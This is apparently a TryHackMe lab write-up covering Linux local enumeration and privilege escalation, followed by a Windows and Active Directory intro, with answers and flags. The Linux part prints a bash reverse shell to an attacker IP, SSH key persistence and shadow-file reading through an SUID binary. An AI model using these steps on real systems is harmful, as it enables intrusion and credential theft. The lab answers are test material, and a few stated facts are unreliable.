Local Enumeration -  Learn to efficiently enumerate a linux machine and identify possible weaknesses

Have you ever found yourself in a situation where you have no idea about "what to do after getting a reverse shell (access to a machine)"?

If your answer was "Yes", this room is definitely for you. This rooms aims at providing beginner basis in box enumeration, giving a detailed approach towards it. TryHackMe Linux: Local Enumeration

 

Here's a list of units that are going to be covered in this room:
 

• Unit 1 - Stabilizing the shell
• Exploring a way to transform a reverse shell into a stable bash or ssh shell.
•  
• Unit 2 - Basic enumaration
• Enumerate OS and the most common files to identify possible security flaws.
•  
• Unit 3 - /etc
• Understand the purpose and sensitivity of files under /etc directory.
•  
• Unit 4 - Important files
• Learn to find files, containing potentially valuable information.
•  
• Unit 6 - Enumeration scripts
•  Automate the process by running multiple community-created enumeration scripts.

Browse to the MACHINE_IP:3000 and follow the instructions.
To continue with the room material, you need to get a reverse shell using a PHP payload and a netcat listener (nc -lvnp 1234).

 
Start up the machine from TryHackMe and go to the url: Machine_IP:3000.

Now, go to this URL http://Machine_IP:3000/cmd.php Then go to your command line and open a netcat listener on the port you set for the php payload.  (reverse shell cheatsheet - CLICK HERE)

nc -nvlp 1234

Now upload this bash reverse shell in this box and hit enter : bash -c 'bash -i >& /dev/tcp/10.8.61.234/1234 0>&1'

Our tun0 IP with Port :- 10.8.61.234/1234

Task 2 Unit 1 - tty


As you might have noticed, a netcat reverse shell is pretty useless and can be easily broken by simple mistakes.

In order to fix this, we need to get a 'normal' shell, aka tty (text terminal).
Note: Mainly, we want to upgrade to tty because commands like su and sudo require a proper terminal to run.

One of the simplest methods for that would be to execute /bin/bash. In most cases, it's not that easy to do and it actually requires us to do some additional work.
Surprisingly enough, we can use python to execute /bin/bash and upgrade to tty:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Generally speaking, you want to use an external tool to execute /bin/bash for you. While doing so, it is a good idea to try everything you know, starting from python, finishing with getting a binary on the target system.
 

List of static binaries you can get on the system: github.com/andrew-d/static-binaries

 

Try experimenting with the netcat shell you obtained in the previous task and try different versions.
 

Read more about upgrading to TTY: blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
 

1) How would you execute /bin/bash with perl?

HINT :- Research! Maybe GTFOBins will give you an idea

Ans :- perl -e 'exec "/bin/bash";'

Task 3 Unit 1 - ssh

To make things even better, you should always try and get shell access to the box.

id_rsa file that contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home folder. (Full path: /home/user/.ssh/id_rsa)

Get that file on your system and give it read-only permissions
(chmod 600 id_rsa) and connect by executing ssh -i id_rsa user@ip).


In case if the target box does not have a generated id_rsa file (or you simply don't have reading permissions for it), you can still gain stable ssh access. All you need to do is generate your own id_rsa key on your system and include an associated key into authorized_keys file on the target machine. 

Execute ssh-keygen and you should see id_rsa and id_rsa.pub files appear in your own .ssh folder. Copy the content of the id_rsa.pub file and put it inside the authorized_key file on the target machine (located in .ssh folder). After that, connect to the machine using your id_rsa file.

1) Where can you usually find the id_rsa file? (User = user)

Ans :- /home/user/.ssh/id_rsa

2)Is there an id_rsa file on the box? (yay/nay)

Ans :- nay 

Task 4 Unit 2 - Basic enumeration

Once you get on the box, it's crucially important to do the basic enumeration. In some cases, it can save you a lot of time and provide you a shortcut into escalating your privileges to root.

> First, let's start with the uname command. uname prints information about the system.

Execute uname -a to print out all information about the system.
This simple box enumeration allows you to get initial information about the box, such as distro type and version. From this point you can easily look for known exploits and vulnerabilities.

> Next in our list are auto-generated bash files.
Bash keeps tracks of our actions by putting plaintext used commands into a history file. (~/.bash_history)

If you happen to have a reading permission on this file, you can easily enumerate system user's action and retrieve some sensitive infrmation. One of those would be plaintext passwords or privilege escalation methods.

.bash_profile and .bashrc are files containing shell commands that are run when Bash is invoked. These files can contain some interesting start up setting that can potentially reveal us some infromation. For example a bash alias can be pointed towards an important file or process.


> Next thing that you want to check is the sudo version.
Sudo command is one of the most common targets in the privilage escalation. Its version can help you identify known exploits and vulnerabilities. Execute sudo -V to retrieve the version.


For example, sudo versions < 1.8.28 are vulnerable to CVE-2019-14287, which is a vulnerability that allows to gain root access with 1 simple command.

 

> Last part of basic enumeration comes down to using our sudo rights.
Users can be assigned to use sudo via /etc/sudoers file. It's a fully customazible file that can either limit or open access to a wider range of permissions. Run sudo -l   to check if a user on the box is allowed to use sudo with any command on the system.







 

Most of the commands open us an opportunity to escalate our priviligies via simple tricks described in GTFObins.
https://gtfobins.github.io/#+sudo


Note: Output on the picture demonstrates that user may run ALL commands on the system with sudo rights. A given configuration is the easiest way to get root.

1) How would you print machine hardware name only?

Ans :- uname -m

2) Where can you find bash history?

Ans :- ~/.bash_history

3) What's the flag?

Ans :- thm{clear_the_history}

Task 5 Unit 3 - /etc

 
Etc (etcetera) - unspecified additional items. Generally speaking, /etc folder is a central location for all your configuration files and it can be treated as a metaphorical nerve center of your Linux machine.

Each of the files located there has its own unique purpose that can be used to retrieve some sensitive information (such as passwords). The first thing you want to check is if you are able to read and write the files in /etc folder. Let's take a look at each file specifically and figure out the way you can use them for your enumeration process.

> /etc/passwd

This file stores the most essential information, required during the user login process. (It stores user account information). It's a plain-text file that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

Read the /etc/passwd file by running cat /etc/passwd and let's take a closer look.

Each line of this file represents a different account, created in the system. Each field is separated with a colon (:) and carries a separate value.

goldfish:x:1003:1003:,,,:/home/goldfish:/bin/bash

1. (goldfish) - Username
2. (x) - Password. (x character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text here)
3. (1003) - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root.
4. (1003) - Group ID (GID): Linux group ID
5. (,,,) - User ID Info: A field that contains additional info, such as phone number, name, and last name. (,,, in this case means that I did not input any additional info while creating the user)
6. (/home/goldfish) - Home directory: A path to user's home directory that contains all the files related to them.
7. (/bin/bash) - Shell or a command: Path of a command or shell that is used by the user. Simple users usually have /bin/bash as their shell, while services run on /usr/sbin/nologin.


How can this help? Well, if you have at least reading access to this file, you can easily enumerate all existing users, services and other accounts on the system. This can open a lot of vectors for you and lead to the desired root.

Otherwise, if you have writing access to the /etc/passwd, you can easily get root creating a custom entry with root priveleges.
(For more info: hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation)
http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation



> /etc/shadow

The /etc/shadow file stores actual password in an encrypted format (aka hashes) for user’s account with additional properties related to user password. Those encrypted passwords usually have a pretty similar structure, making it easy for us to identify the encoding format and crack the hash to get the password.

So, as you might have guessed, we can use /etc/shadow to retrieve different user passwords. In most of the situations, it is more than enough to have reading permissions on this file to escalate to root privileges.
 

cat /etc/shadow


goldfish:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAM

Wf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:184

83:0:99999:7:::

 

1. (goldfish) - Username
2. ($6$1FiLdnFwT...) - Password : Encrypted password.
Basic structure: **$id$salt$hashed**, The $id is the algorithm used On GNU/Linux as follows:
- $1$ is MD5
- $2a$ is Blowfish
- $2y$ is Blowfish
- $5$ is SHA-256
- $6$ is SHA-512
3. (18483) - Last password change: Days since Jan 1, 1970 that password was last changed.
4. (0) - Minimum: The minimum number of days required between password changes (Zero means that the password can be changed immidiately).
5. (99999) - Maximum: The maximum number of days the password is valid.
6. (7) - Warn: The number of days before the user will be warned about changing their password.

 

What can we get from here? Well, if you have reading permissions for this file, we can crack the encrypted password using one of the cracking methods.

 

Just like with /etc/passwd, writeable permission can allow us to add a new root user by making a custom entry.

> /etc/hosts

/etc/hosts is a simple text file that allows users to assign a hostname to a specific IP address. Generally speaking, a hostname is a name that is assigned to a certain device on a network. It helps to distinguish one device from another. The hostname for a computer on a home network may be anything the user wants, for example, DesktopPC or MyLaptop.

You can try editing your own /etc/hosts file by adding the MACHINE_IP there like so:

From now on you'll be able to refer to the box as box.thm.

Why do we need it? In real-world pentesting this file may reveal a local address of devices in the same network. It can help us to enumerate the network further.
 

1) Can you read /etc/passwd on the box? (yay/nay)

Ans :- yay

Task 6 Unit 4 - Find command and interesting files

Since it's physically impossible to browse the whole filesystem by hand, we'll be using the find command for this purpose.
 

The most important switches for us in our enumeration process are -type and -name.
 

The first one allows us to limit the search towards files only -type f and the second one allows us to search for files by extensions using the wildcard (*).

Basically, what you want to do is to look for interesting log (.log) and configuration files (.conf). In addition to that, the system owner might be keeping backup files (.bak).

Here's a list of file extensions you'd usually look for: List.
 

To find the password I used the command:

find -type f -name “*.bak” 2>/dev/null     

OR

locate .bak
  
   
To find the flag we can use the same commands only to search for a file called flag.conf as it ask to find a flag and the hint said it could be in a .conf file

find / -type f -name “flag.conf” 2>/dev/null
   
OR

locate flag.conf    

1) What's the password you found?

Ans :-THMSkidyPass

2) Did you find a flag?

Ans :- thm{conf_file}

Task 7 Unit 4 - SUID

Set User ID (SUID) is a type of permission that allows users to execute a file with the permissions of another user.

Those files which have SUID permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found SUID bit enabled binaries, then those file/program/command can be run with root privileges.

SUID abuse is a common privilege escalation technique that allows us to gain root access by executing a root-owned binary with SUID enabled.

 

You can find all SUID file by executing this simple find command:

find / -perm -u=s -type f 2>/dev/null

OR

find / -perm -4000 2>/dev/null

-u=s searches files that are owned by the root user.
-type f search for files, not directories

 

After displaying all SUID files, compare them to a list on GTFObins to see if there's a way to abuse them to get root access.
 

1) Which SUID binary has a way to escalate your privileges on the box?

Ans :- grep

2) What's the payload you can use to read /etc/shadow with this SUID?

Ans :-  grep ' ' /etc/shadow

Task 8 [Bonus] - Port Forwarding

According to Wikipedia, "Port forwarding is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall".

 

Port forwarding not only allows you to bypass firewalls but also gives you an opportunity to enumerate some local services and processes running on the box.

The Linux netstat command gives you a bunch of information about your network connections, the ports that are in use, and the processes using them. In order to see all TCP connections, execute netstat -at | less. This will give you a list of running processes that use TCP. From this point, you can easily enumerate running processes and gain some valuable information.

netstat -tulpn will provide you a much nicer output with the most interesting data.


https://fumenoid.github.io/posts/port-forwarding



Read more about port forwarding here: fumenoid.github.io/posts/port-forwarding
Try using those commands on your system!

Task 9 Unit 5 - Automating scripts

Even though I, personally, dislike any automatic enumeration scripts, they are really important to the privilege escalation process as they help you to omit the 'human error' in your enum process.

> Linpeas

LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) is a script that searches for possible paths to escalate privileges on Linux/ hosts.

Linpeas automatically searches for passwords, SUID files and Sudo right abuse to hint you on your way towards root.

 

They are different ways of getting the script on the box, but the most reliable one would be to first download the script on your system and then transfer it on the target.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

 

After that, you get a nice output with all the vulnerable parts marked.

> LinEnum

The second tool on our list is LinEnum. It performs 'Scripted Local Linux Enumeration & Privilege Escalation Checks' and appears to be a bit easier than linpeas.

You can get the script by running:


wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Now, as you have two tools on the box, try running both of them and see if either of them shows something interesting!

Please note: It's always a good idea to run multiple scripts separately and compare their output, as far as each one of them has their own specific scope of 

exploration. Got it!

Task 10 Resources and what's next?

Congratulations! You have successfully gone through Linux local enumeration!
Now you can understand the main concepts of manual and automatic enumeration which will lead you towards obtaining root!


We recommend you to continue your education by completing these awesome rooms, covering more in-depth privilege escalation:

1. https://tryhackme.com/room/sudovulnsbypass
2. https://tryhackme.com/room/commonlinuxprivesc
3. https://tryhackme.com/room/linuxprivesc


After doing so, you can practice your skills by completing these easy challenge machines:

1. https://tryhackme.com/room/vulnversity
2. https://tryhackme.com/room/basicpentestingjt
3. https://tryhackme.com/room/bolt
4. https://tryhackme.com/room/tartaraus
 

Bonus :-

1) Common Linux File Extension :-  https://lauraliparulo.altervista.org/most-common-linux-file-extensions/

2) Port Forwarding :- https://fumenoid.github.io/posts/port-forwarding

3) Local File Enumeration Scripts :- https://github.com/Arr0way/linux-local-enumeration-script

4) For "Clear" Command Fix :- export TERM=xterm

Disclaimer

Windows history

On November 20, 1985 Microsoft announced its operating system named Windows which was a graphical operating system shell as a response to growing GUIs (graphical user interfaces). At the moment Windows dominates the word of computers with around 90% market share and it overtook Apple (Mac OS) which was introduced in 1984. Intro to windows - active directory and Azure active directory

Windows versions:

•     Windows 1
•     Windows 2
•     Windows 2.x
•     Windows 3.x
•     Windows 95
•     Windows 98
•     Windows NT
•     Windows XP
•     Windows Vista
•     Windows 7
•     Windows 8.x
•     Windows 10

Windows server versions:

•     Windows Server 2003
•     Windows Server 2008
•     Windows Server 2012 / 2012 R2
•     Windows Server 2016
•     Windows Server 2019

Read a little about Windows history and versions.

1) When was Windows announced?

Ans :- November 20 1985



2) Which is the latest version of Windows?

Ans :- windows 10



3) Which is the latest version of Windows Server?

Ans :- windows server 2019

Task 2 Windows file system and permissions explained

What is the file system?


It is the method and data structure that an operating system uses to keep track of files on a disk or partition. Without a file system, the information saved in a storage media would be one large body of data with no way to tell where the information begins and ends.



Windows file system structure is:

• Logical drives (Ex: Local Disk C)
• Folders (these are the folders that come by default. Ex: Documents, Downloads, Music)
• Files

Something that might also interest you would be the folders located on the C drive and their role. These folders are:

•     PerfLogs
•     Program Files
•     Program Files (x86)
•     Users
•     Windows

Let me break them down and explain each of them:

• PerfLogs - Stores the system issues and other reports regarding performance
• Program Files and Program Files (x86) - Is the location where programs install unless you change their path (Ex: Choosing to install software on D drive)
• Users - In this folder are stored the users created. It also stores users generated data (Ex: Saving a file on your Desktop)
• Windows - It's the folder which basically contains the code to run the operating system and some utility tools (we'll talk about them later)

File permissions


FIles permissions can be set by an administrator or a privileged account. These permissions can be applied to:

•     Users
•     Groups

   

Permissions that can be set are:

•     Full control
•     Modify
•     Read & execute
•     List folders content
•     Read
•     Write
•     Special permissions

• Full control - allows the user/users/group/groups to set the ownership of the folder, set permission for others, modify, read, write, and execute files.
•  
  
• Modify - allows the user/users/group/groups to modify, read, write, and execute files.
•  
  
• Read & execute - allows the user/users/group/groups to read and execute files.
•  
• List folder contents - allows the user/users/group/groups to list the contents (files, subfolders, etc) of a folder.
•  
• Read - only allows the user/users/group/groups to read files.
•  
• Write - allows the user/users/group/groups to write data to the specified folder (automatically set when "Modify" right is checked).

Note: You can allow or deny permissions for users or groups.

To set permissions for a file or folder right click on the file and select "Properties". Go to the "Security" tab and click on the "Edit" button.

As you can see Users can only read, execute, and list the folder contents. However, we want to allow them to be able to store, edit, or delete files inside that folder. To do that, check the "Modify" box (you will see that by checking the Modify box the Write box will be automatically checked too).

To apply the changes click on the "Apply" button.



The reason we do not set the full control permission on the folder is that users could set permissions and take ownership of the folder themselves (without the action of an administrator/privileged user).

A tool you can use to check the files or folder permissions is "icacls".

Let's explain what those letters in parentheses mean as right now you might be confused.

• I - permission inherited from the parent container
• F - full access (full control)
• M - Modify right/access
• OI - object inherit
• IO - inherit only
• CI - container inherit
• RX - read and execute
• AD - append data (add subdirectories)
• WD - write data and add files

You can use icacls to check permissions, set ownership of the folder, set, remove or deny permissions. An example would be setting the ownership of the folder to Users.


To check if that applied you can right-click on the folder and select "Properties", go to the "Security" tab, and click on "Advanced". There you should be able to see that the owner is "Users".

Read the above.

In which folder are users profiles stored?

Ans :- users

Task 3 Understanding the authentication process

What is authentication?

Authentication is a process for verifying the identity of a person (or an object or a service). When you authenticate a person, the goal is to verify that the person is not an imposter.

Local authentication

Local authentication is done using the Local Security Authority (LSA). LSA is a protected subsystem that keeps track of the security policies and the accounts that are on a computer system. It also maintains information about all aspects of local security on a computer.



Types of Active Directory

There are two types of Active Directory:

• On-Premise Active Directory (AD)
• Azure Active Directory (AAD)

Authentication on On-Premise Active Directory
 

 

On-premise Active Directory has a record of all users, PCs and Servers and authenticates the users signing in (the network logon). Once signed in, Active Directory also governs what the users are, and are not, allowed to do or access (authorization).


In an on-premise Active Directory environment the authentication can be made by using the following protocols:

•     NTLM
•     LDAP / LDAPS
•     KERBEROS

NTLM / NTLM 2

_______________

NTLM uses a challenge-response sequence of messages between a client and a server system. NTLM  provides authentication based on a challenge-response authentication scheme. It does not provide data integrity or data confidentiality protection for the authenticated network connection.

 

LDAP / LDAPS

_______________

The main difference between LDAP and LDAPS is that LDAPS support encryption and therefore the credentials are not sent in plain text across the network.

Another thing to keep in mind is that the Domain Controller (DC) can be considered a database of users, groups, computers and so on (contains information about objects). Using LDAP/LDAPS the user's workstation sends the credentials using an API to the Domain Controller in order to validate them and be able to log in.

The procedure is similar to the image below:

KERBEROS

_______________

Another way to authenticate is using Kerberos. Kerberos uses symmetric-key cryptography and requires trusted third-party authorization to verify user identities. The authentication process is similar to the one below:

Authentication on Azure Active Directory

Azure Active Directory is a secure online authentication store, which can contain users and groups. Users have a username and a password which are used when you sign in to an application that uses Azure Active Directory for authentication. So, for example, all of the Microsoft Cloud services use Azure Active Directory for authentication: Office 365, Dynamics 365 and Azure.

Azure Active Directory supports the following authentication methods:

•     SAML (Security Assertion Markup Language)
•     OAUTH 2.0
•     OpenID Connect

SAML (Security Assertion Markup Language)

_______________

Security Assertion Markup Language (SAML) is a type of Single Sign-On (SSO) standard. It defines a set of rules/protocols that allow users to access web applications with a single login. This is possible because those applications (referred to as “Service Providers”) all trust the systems that verify users’ identities (referred to as “Identity Providers”).

• Service Providers - These are the systems and applications that users access throughout the day.

• Identity Providers - This would be the system that performs user authentication.

OAUTH 2.0

_______________

OAuth 2.0 is a standard that apps use to provide client applications with access.

OAuth 2.0 spec has four important roles:

• The authorization server, which is the server that issues the access token.
• The resource owner, normally your application's end-user, that grants permission to access the resource server with an access token.
• The client, which is the application that requests the access token, and then passes it to the resource server.
• The resource server, which accepts the access token and must verify that it is valid. In this case, this is your application.

OpenID Connect

_______________

OpenID Connect is an authentication standard built on top of OAuth 2.0. It adds an additional token called an ID token.

For that, it uses simple JSON Web Tokens (JWT). While OAuth 2.0 is about resource access and sharing, OIDC is all about user authentication

 

1) Which Active Directory is cloud based?

Ans :- Azure Active Directory

2) Which authentication method does not provide data integrity?

Ans :- NTLM

 
4) Authentication method that assings a ticket in order for a user to login?

Ans :- kerberos

3) Which authentication method allow users to access applications with a single login (short name)?

Ans :- SAML

4) Authentication method that uses JSON Web Tokens?

Ans :- openID connect

Task 4 Utility tools

Built-in utility tools

Windows comes with a variety of utility tools. Some of them are:

•     Computer Management
•     Local Security Policy
•     Disk Cleanup
•     Registry Editor
•     Command-line tools
•     Registry Editor (Regedit)

Let's break each of them down and see their usage and why they are important.

Computer Management

Computer Management contains more tools such as:

•     Task Scheduler
•     Event Viewer
•     Shared Folders
•     Local users & computers
•     Performance Monitor
•     Disk Management
•     Services & Applications

Task Scheduler - This is a tool that allows predefined actions to be automatically executed whenever a certain set of conditions is met(Ex: You can set up a date and time for a piece of software to be installed, or a script to run).

Event Viewer - Probably one of the most important tools that come with Windows. The Event Viewer logs events that happen across the device (Ex: Successful & Failed login attempts, System Errors, etc). The reason Event Viewer is important is because it can be used to forward the events to a SIEM (Security Information and Event Manager) which helps the IT team of a company determine possible malicious activities.

Shared Folders - Is a directory or a folder that can be shared across the network and can be accessed by multiple users.

Local users and computers - Using local users and computers we can create users, add them to different built-in groups, and they can be given different levels of access (Ex: User A can connect through RDP to a machine but user B can't).

Performance Monitor -Performance Monitor monitors the different activities across the device such as CPU usage, memory usage, etc.

Disk Management - Using Disk Management you can shrink, expand, create new partitions (drives) and format the partitions.

Services & Applications - It is possible to check the running services on the system and you have the ability to start, stop or restart them.


 

Local Security Policy

Local Security Policy is a group of settings you can configure to strengthen the computer's security. Even though
most policy settings in Windows are fine, there are a few that need adjusting for enhanced security. You can set the minimum password length, the password complexity level, you can disable guest & local administrator accounts, and many more.

Note: If the computer is not integrated into an Active Directory environment disabling local administrator account is a bad idea.

Disk Cleanup

Another useful utility is Disk Cleanup. Using Disk Cleanup we can delete files that are no longer needed by the system and are just adding up to the computer disk space. Running Disk Cleanup as administrator we can also clean system files (Ex: sometimes, after getting updates some files remain on disk, but these are no longer needed).

To access Disk Cleanup right-click on Local Disk C and click Properties. You should see a button in the General tab named "Disk Cleanup".


 

You just need to tick the box/files you want to clean and press OK.

Registry Editor

The Windows registry database stores many important operating system settings. For example, it contains entries with information about what should happen when double-clicking a particular file type or how wide the taskbar should be. Built-in and inserted hardware also stores information in the registry when the driver is installed; this driver is called up every time the system is booted up.

To access the Registry Editor you can either search it or use Windows Key + R and type RegEdit.

Command-line tools

Windows comes equipped with two command-line tools:

•     CMD
•     Powershell
•     Windows Terminal

CMD is the command-line interpreter for Microsoft Windows operating systems used to automate various system-related tasks using scripts and batch files. Users can interact with the OS directly using text-based commands. It emulates most of the command line abilities available in MS-DOS through a command-line interface.


Powershell is mainly used by sysadmins to manage the network and domain they handle, as well as the computers and other devices that are part of it. PowerShell is a scripting language. The PowerShell can interpret batch commands and Powershell commands, but the command prompt can only interpret batch commands.


Both CMD and Powershell are powerful command-line tools used to automate system administration tasks by writing a script/batch file. However, CMD has limited administration capabilities as compared to Powershell, which, on the other hand, is a more advanced and modern shell implementation with additional features and enhancements (Ex: cmdlets).


Windows Terminal can be used instead of Powershell and CMD and can be installed from the Microsoft Store. The application includes multiple tab support, alongside themes and customization for developers who want to tweak the Terminal.

Registry Editor

Registry Editor can be considered a database that contains low-level settings for Microsoft Windows settings and applications. The registries are structured as follows:

•     HKEY_CLASSES_ROOT
•     HKEY_CURRENT_USER
•     HKEY_LOCAL_MACHINE
•     HKEY_USERS
•     HKEY_CURRENT_CONFIG

A feature of Powershell is that you can browse the registries. You can do that by typing: "cd <REG DB>" (Example: cd HKLM:\).

Windows also has a builtin tool named "reg" which can be used from the command line to add, remove, query, import, export, etc registry keys.

There is also available a GUI that can be used. You can search for "Regedit" or type it in the command line.

There is no point to remember the paths for some settings that are located in the registry editor. You can look up for the settings on the internet.

Task 5 Types of servers

What is a server?

A server is a piece of hardware or software equipment that provides functionality for other softwares or devices.

Types of servers

Servers can be used for a variety of actions or things. The most common ones are:

•     Domain Controller
•     File server
•     Web server
•     FTP Server
•     Mail Server
•     Database Server
•     Proxy Server
•     Application Server

Domain Controller - Might be one of the most important servers because in an AD or AAD infrastructure we can control users, groups, restrict actions, improve security, and many more of other computers and servers.

File Server - File servers provide a great way to share files across devices on a network.

Web Server- It serves static or dynamic content to a Web browser by loading a file from a disk and serving it across the network to a user’s Web browser.

FTP Server - Makes possible moving one or more files securely between computers while providing file security and organization as well as transfer control.

Mail Server - Mail servers move and store mail over corporate networks (via LANs and WANs) and across the Internet.

Database Server - A database server is a computer system that provides other computers with services related to accessing and retrieving data from one or multiple databases.

Proxy Server - This server usually sits between a client program and an external server to filter requests, improve performance, and share connections.

Application Server - They're usually used to connect the database servers and the users.
 

Read the above.
 

1) Which can be considered the most important server?

Ans :- Domain Controller

2) Which server can store emails?

Ans :- Mail Server

Task 6 Users and Groups Management

Users and Groups Management in Active Directory

In Active Directory user management is done using the Active Directory Users and Computers. To access it go to Tools > Active Directory Users and Computers.

Before any other action let's enable Advanced Features which adds additional features when looking at an object properties. That is doable by going to View > Advanced Features.

By double-clicking on thm.lab we are presented with the Active Directory tree.

Let's create an Organizational Unit (OU) where to store the users. To do that right-click on the domain name (thm.lab) and go to New > Organizational Unit. I named it LAB and clicked OK to create it.

Let's create two more OUs inside the newly created OU (it will look nested). In one OU we'll store users and in the second one, we'll store Groups. To create the OU's we can repeat the steps above (Right-click on LAB OU > New > Organizational Unit).

Time to create some users and groups! To do so right-click on the Users OU and go to New > User and fill in the information required.

Click Next and set a password for the user.

The reason I checked only "Password never expires" is because I do not want the password to expire after a period of time (the default period of time in AD is 42 days). In a production environment, you would probably check "User must change password at next logon" so the user can set a password he desires after you created his AD account.

Since the password can be set to expire after a period of time it would be a bad idea to check the "User cannot change password" because he won't be able to reset the password and you will have to manually intervene.

As for the last box "Disable account" it's obvious the action that will take place. It will disable the user account. You might want to disable a user account in case he has a leave (let's say 6 months leave) and you do not want him or any other colleague or malicious entity to use his account.

Click on Next and you will be shown the account information and click Finish to finish the account creation.

Note: The username that is going to be used by the user in order to authenticate is the one you set in the User Logon Name.

You've successfully created your first AD user. Now, create two more users and name them as you wish.

We should have three users in the AD:

Let's move to the Groups OU. Right click on the OU > New > Group.

I named the group Admins and clicked OK to create it.

Then I created another group named RDP Access.

And finally using the same method create one more group named No RDP Access.

We should have the following groups in AD:

To assign a user to a group you can do that in two ways:

    Right-clicking a user > Add to a group

2. Double-clicking a group > click on Members tab > Add

Using the first method let's add Albert Einstein to the Admins group. A window will be prompted to search for an object in the AD. You can type in the Enter object name to select field the name of the group created (in my case Admins), click Check Names, and OK to add the user to the specified group.

Proceed to add one of the created users to the RDP Access group and the other to the No RDP Access group.

Another thing to keep in mind is that an object can be a member of another object (Ex: A group can be a member of another group).

We added Albert Einstein to a group named Admins. Let's add the Admins group to the Domain Admins group. To do that we can right-click on Admins group > Add to a group and search for Domain Admins and press OK.

As we've done with Albert Einstein's account, add both RDP Access and No RDP Access groups to the Remote Desktop Users group

Note: Even though adding the No RDP Access group to the RDP Users group the No RDP Access group can be blocked using GPO. This will be done in the next task (Creating your first GPO).

Task 7 Creating your first GPO

What is Group Policy Objects?

A GPO or a Group Policy Object is a feature of Active Directory that adds additional controls to user accounts and computers.

Group Policy settings including local settings, site-wide settings, domain-level settings and settings applied to organizational units.

Creating our first GPO

To create a GPO we need to go to Tools > Group Policy Management inside the Server Manager.

Right-click on "Group Policy Objects" and create a new object. I will name mine "Groups GPO".
To edit the GPO right-click on it > Edit.

For the purpose of this demo, we will set different permissions for the groups recently created.

First, let's let users authenticate using RDP. To do so, go to Policies > Windows Settings > Security Settings > Local Policies > Users Right Assignment and double click on Allow log on through Remote Desktop Services.

Select Define these policy settings > Add user or group > Browse

Search for Admins and RDP Access groups and click OK > OK to add them.


 

To block a user or a group to login using RDP we can do that by double-clicking Deny log on through Remote Desktop Services and adding No RDP Access group in there.

We can close the editor and go back to our Group Policy Management console/tab/panel. In order to make the policy apply, we have to link the GPO to the root of the domain (thm.lab). To do that right-click on Domain Controllers OU > Link an existing GPO and select the GPO you created (Group GPO in my case) and press OK.

To apply the GPO open a CMD as an administrator (right-click on it > Run as administrator) and type the following: gpupdate /force and wait for the policy to apply.

Testing the GPO

Let's try to RDP into the machine using each user and see the different level of access each has.

The first user I'm going to login is Albert Einstein which has Domain Admin rights. The logon is successful. Open a CMD as admin and type "whoami".

As noticed we were able to start an elevated CMD.


Sign out and log in using the account added to RDP Access group (In my case Jim Carrey).

Try prompting an elevated CMD (Right-click on CMD > Run as administrator). You notice that UAC (User Account Control) asks for admin credentials. If you try entering the credentials (username and password) of the account you are currently logged in you will notice the CMD prompt will not pop out. This happens because you are a simple user on the machine, not an administrator.


 

Note: You can spawn the shell if you use an administrator credential (in my case Albert Einstein).


Lastly, try logging in with the account added to the No RDP Access. You will get the following error:

This happens because even though the No RDP Access group has been added to the Remote Desktop Users group using the GPO earlier created he have blocked RDP access to the users that are in that group.